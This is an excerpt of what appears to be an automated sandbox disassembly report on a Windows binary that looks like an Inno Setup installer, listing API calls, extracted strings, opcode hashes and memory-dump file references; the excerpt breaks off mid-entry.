                                                                                        • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                        • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                        • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                        • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                        • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                        • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                        • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                        • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                        • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                        • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1452528299-0
                                                                                        • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                        • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                        • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                        • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                        APIs
                                                                                        • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                        • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                        • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                        • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                        • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                        • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                        • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                        • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                        • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                        • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                        • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                        • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                        • API String ID: 2323315520-3614243559
                                                                                        • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                        • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                        • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                        • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0045862F
                                                                                        • QueryPerformanceCounter.KERNEL32(021A3858,00000000,004588C2,?,?,021A3858,00000000,?,00458FBE,?,021A3858,00000000), ref: 00458638
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(021A3858,021A3858), ref: 00458642
                                                                                        • GetCurrentProcessId.KERNEL32(?,021A3858,00000000,004588C2,?,?,021A3858,00000000,?,00458FBE,?,021A3858,00000000), ref: 0045864B
                                                                                        • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                        • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021A3858,021A3858), ref: 004586CF
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                        • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                        • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                        • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                        • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                        • API String ID: 770386003-3271284199
                                                                                        • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                        • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                        • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                        • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                        APIs
                                                                                          • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                          • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                          • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                          • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0), ref: 004783CC
                                                                                          • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                          • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,021A2BE0,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                        • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                        • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                        • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                        • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                        • API String ID: 883996979-221126205
                                                                                        • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                        • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                        • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                        • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                        • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1631623395-0
                                                                                        • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                        • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                        • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                        • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 00418393
                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                        • GetWindowRect.USER32(?), ref: 004183CC
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                        • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                        • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                        • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                        • String ID: ,
                                                                                        • API String ID: 2266315723-3772416878
                                                                                        • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                        • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                        • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                        • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                        • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                        • String ID: SeShutdownPrivilege
                                                                                        • API String ID: 107509674-3733053543
                                                                                        • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                        • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                        • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                        • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                        • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                        • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                        • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CryptVersion
                                                                                        • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                        • API String ID: 1951258720-508647305
                                                                                        • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                        • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                        • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                        • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                        • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirstNext
                                                                                        • String ID: isRS-$isRS-???.tmp
                                                                                        • API String ID: 134685335-3422211394
                                                                                        • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                        • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                        • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                        • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                        APIs
                                                                                        • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                        • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                        • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                        • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                        Strings
                                                                                        • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
